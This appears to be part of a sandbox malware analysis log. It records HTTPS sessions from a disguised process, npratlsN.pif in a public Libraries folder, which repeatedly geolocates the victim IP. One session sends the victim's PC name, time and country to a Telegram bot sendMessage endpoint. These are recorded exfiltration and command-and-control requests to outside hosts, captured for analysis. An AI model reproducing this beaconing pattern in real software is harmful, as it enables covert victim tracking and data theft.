                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        2025-01-06 06:53:42 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:42 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:42 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461211
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kW0vWumFHOoHhaq96r2kTJGxv4E5ThgIWXECd%2Fyq1Oms24kmtmA%2BZ%2FiAkOkRt5eV%2BcZ1D7LFWLx%2Fb38vBgCuk4Bihz8IKHq%2BV0gpv4wN0ud151jFU33haZL7Obe0Ux7OBxcmz4aI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cae59bd6429d-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1693&rtt_var=652&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1658148&cwnd=246&unsent_bytes=0&cid=9c7ff96607af2e41&ts=156&x=0"
                                                                                                                                                                        2025-01-06 06:53:42 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        15 | 192.168.2.4 | 49788 | 188.114.96.3 | 443 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        2025-01-06 06:53:45 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:45 UTC | 863 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:45 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461214
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mSCISlFuf7YXcjqfLgrD9MxtaL82ME%2BT%2FeO4PnLbMdjFeK3HJeOx6MnTzSexl7CwuDEBhIjUXr85A7%2B7VWVyL3pSgqfnBS%2BUNi7A%2FG%2F79zmvgWTzU6Llu12n6I6PgGgjxkw%2FGLbk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9caf61afa8c65-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2012&rtt_var=767&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1414043&cwnd=204&unsent_bytes=0&cid=1b097354527a42b3&ts=156&x=0"
                                                                                                                                                                        2025-01-06 06:53:45 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        16 | 192.168.2.4 | 49789 | 188.114.96.3 | 443 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        2025-01-06 06:53:45 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:45 UTC | 865 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:45 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461214
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FcqhEAZ9TAbt%2Be7fYRoI%2Bc0IiunGqcrIwv5pqXXC%2B1LRfRmgcqPWdUUwFDIWJbd%2FPqF1SN0DRgpRBqiRcMFsbWyYoHDttCFK6Dy%2F6GS1%2B3OMhFFy4FcDFXn%2BrrrDfeOvkff7joPe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9caf8ac7b4277-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1878&min_rtt=1871&rtt_var=716&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1514522&cwnd=191&unsent_bytes=0&cid=ce9b758ea916706c&ts=258&x=0"
                                                                                                                                                                        2025-01-06 06:53:45 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        17 | 192.168.2.4 | 49792 | 188.114.96.3 | 443 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        2025-01-06 06:53:46 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:46 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:46 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461215
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o93kGhyrciBnJCw0WZeFdFfyHdnLPtzK7%2FxWgMflNf9uqIkHMiOA5AyD5PYklR1T4Scr2c0HBcYsbNxlWsjLRu%2BAEPtfBG4u70RmyG7N555Xx4jFF9npU%2B7powlm9JIqno8Z7qZb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cafd9dcf43da-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1566&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1795817&cwnd=203&unsent_bytes=0&cid=a700d585ede34eeb&ts=139&x=0"
                                                                                                                                                                        2025-01-06 06:53:46 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        18 | 192.168.2.4 | 49791 | 188.114.96.3 | 443 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        2025-01-06 06:53:46 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:46 UTC | 854 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:46 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461215
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JEVCMO2gWm5wz8zgozhh27N3No7wqTB81s5PoXSOWujBkFaSm3ingcf3i3SUzUUWGEJgAWi3c56ZGN6bg%2FpntPgS9SYF9s0ogF0Q%2BtxRnRRvi1u5JzUUMICURicueJjY0IoH9sXA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cafdcd1672b9-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4505&min_rtt=2026&rtt_var=2442&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1441263&cwnd=214&unsent_bytes=0&cid=8f311243ef6b99d1&ts=155&x=0"
                                                                                                                                                                        2025-01-06 06:53:46 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49795 | 188.114.96.3 | 443 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:48 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-06 06:53:48 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:48 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461217
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9HSsfwQmZHgZONzyr5Hw7lbvgjQVmBQuvsBdYtbtSEIFk30vND0SndK1adr9uAaFtRqXzZcHkI10VKxuCCJkjPnQBIQvmEua7V32JYRstxxwscNW2B%2F%2FCmmEWFXsLqdZ0PG%2FLuwE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb093fb143bd-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1586&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1710603&cwnd=190&unsent_bytes=0&cid=cc14b7b658cb2a13&ts=173&x=0"
2025-01-06 06:53:48 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49798 | 188.114.96.3 | 443 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:49 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-06 06:53:49 UTC | 862 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:49 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461218
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IOAIMwWkyWazjzBAo%2BdJDqfJOCXgX%2FZEDiq7H9fi2LcHd33PY0k9ooV8kwJdWWtyiS7SN0yg6%2BrOr6aa%2BSjBu%2Ff73qXxx5Vry9Mg6WBm1YG7W45yDfAdke%2FFOAcADlJijKUMP%2BpH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb0e985c334e-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2002&min_rtt=2000&rtt_var=755&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1445544&cwnd=32&unsent_bytes=0&cid=bc7595ba6fe10db7&ts=170&x=0"
2025-01-06 06:53:49 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49799 | 188.114.96.3 | 443 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:49 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
2025-01-06 06:53:49 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:49 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461218
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xzdZ0L34bv7mvT%2BqL13Yw0bEasPA04MCW9tKDekMSOz33aE13gcQyt7xMH6FSjI7f0U%2F46MGvyGdOt844A8DPoaYb2THhISeFV2u8otJnRT2SrDv1INFImM%2BQU6eG%2BTkwSVfOiHM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb11a996439a-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1606&rtt_var=617&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1750599&cwnd=233&unsent_bytes=0&cid=f224d6f594ff932f&ts=155&x=0"
2025-01-06 06:53:49 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49802 | 188.114.96.3 | 443 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:50 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-06 06:53:50 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:50 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461219
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1y0GeG%2BPe2KRKNkHDW9OqTFC4qqXke2%2FRtbFzGuqWtsXNU8HkYKcP4fkfI%2FqgzAfYQJsk9PILeJV2tbITDYD3v3%2BNrwGl1eBlFBt1TL07HfV8BUz7QJLsCNVCffM6txFqt3zS%2Fh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb163f460f36-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1515&rtt_var=579&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1871794&cwnd=231&unsent_bytes=0&cid=67c2f8e7e325de0d&ts=145&x=0"
2025-01-06 06:53:50 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49804 | 188.114.96.3 | 443 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:51 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
2025-01-06 06:53:51 UTC | 851 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:51 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461220
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UhmxYeCRVD2Nlni801NJLExKj8E9hCtFkMSYHTpXt5bhvh3fz75s%2BesndcFvKc1XhKLVMOJ8J525xSRMm4k5cW1ZlC66OERddS0EigCn1SI0zPMSyvVSr2uWhk8BKPEz7pamFAtS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb1bbf82f791-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1621&rtt_var=622&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1740166&cwnd=147&unsent_bytes=0&cid=5d47f9c94fb9d825&ts=142&x=0"
2025-01-06 06:53:51 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49805 | 149.154.167.220 | 443 | 3980 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:52 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:55:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                                        Connection: Keep-Alive
2025-01-06 06:53:52 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:52 GMT
                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-06 06:53:52 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49806 | 188.114.96.3 | 443 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:53 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-06 06:53:53 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:53 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461222
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3t9IssWEQrgEAXivn3hrhFcJG9wwUGFh450KIzFzgGI2W8F3jNBdCEQmXCsbT%2BCFkmmsUWkp9ore8UdqFUlUnKX97t1ccM72Oy041f8d%2FtG%2BgSqhRgX9HOF1hPQEOXKW8U2LDr0m"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb271c1543bf-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1565&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1757977&cwnd=252&unsent_bytes=0&cid=dffaa2a6f7435315&ts=167&x=0"
2025-01-06 06:53:53 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49808 | 188.114.96.3 | 443 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:55 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
2025-01-06 06:53:55 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:55 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461224
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93fSb1Hj%2Fv%2BWX09lSradzreG0GQIubhIrVD5kjlAgWSA7hC20L392jA%2FCQBvrDR8OyT%2BcNC6GrFv3SCTnt1MG6qDrYC5VSGSYInnG7s2CTEnJ7z6cowkQa%2BnlElBcVAUECeLd9PG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb338f5942eb-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1684&min_rtt=1677&rtt_var=643&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1684939&cwnd=211&unsent_bytes=0&cid=25f5b8dc023f8f21&ts=158&x=0"
2025-01-06 06:53:55 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49811 | 188.114.96.3 | 443 | 7692 | C:\Users\Public\Libraries\npratlsN.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:53:56 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
2025-01-06 06:53:56 UTC | 853 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:56 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461226
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qg6%2BxanPb6i95O%2FNwh6Y0XIv6CtSXI5v8JeWKu2shpR6C8pWRtdkgYC6jAxhN9mmgg5rJieF35cencrdqgxcbTw2qOXP6ISh01rBhgTOHXwGo7piBFLsDr8EVRxt1kCZfgHu9iF0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb3e7c807c81-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2064&min_rtt=2060&rtt_var=782&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1391801&cwnd=241&unsent_bytes=0&cid=566489cd0ea50773&ts=149&x=0"
